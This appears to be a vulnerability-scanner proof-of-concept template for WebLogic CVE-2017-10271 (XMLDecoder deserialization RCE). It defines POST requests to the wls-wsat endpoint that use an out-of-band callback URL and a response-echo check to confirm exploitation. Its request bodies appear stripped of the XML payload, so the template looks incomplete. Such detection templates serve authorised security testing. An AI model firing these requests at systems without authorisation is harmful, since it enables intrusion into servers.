name: poc-yaml-weblogic-cve-2017-10271
set:
reverse: newReverse()
reverseURL: reverse.url
groups:
reverse:
- method: POST
path: /wls-wsat/CoordinatorPortType
headers:
Content-Type: text/xml
body: >-
{{reverseURL}}
follow_redirects: true
expression: >
reverse.wait(5)
echo:
- method: POST
path: /wls-wsat/CoordinatorPortType
headers:
Content-Type: text/xml
body: >-
505053555551485749
follow_redirects: true
expression: >
response.body.bcontains(b"225773091")
detail:
vulnpath: "/wls-wsat/CoordinatorPortType"
author: fnmsd(https://github.com/fnmsd)
description: "Weblogic wls-wsat XMLDecoder deserialization RCE CVE-2017-10271"
links:
- https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2017-10271
- https://github.com/QAX-A-Team/WeblogicEnvironment
- https://xz.aliyun.com/t/5299